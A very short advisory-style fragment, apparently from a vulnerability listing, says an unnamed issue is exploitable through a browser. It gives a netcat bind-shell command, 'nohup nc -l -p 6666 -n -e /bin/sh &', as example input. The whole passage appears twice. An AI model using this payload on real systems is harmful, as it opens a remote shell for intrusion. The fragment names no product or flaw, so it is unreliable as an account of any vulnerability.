An attacker can exploit this issue via a browser.
The following example input is available:
nohup nc -l -p 6666 -n -e /bin/sh &
An attacker can exploit this issue via a browser.
The following example input is available:
nohup nc -l -p 6666 -n -e /bin/sh &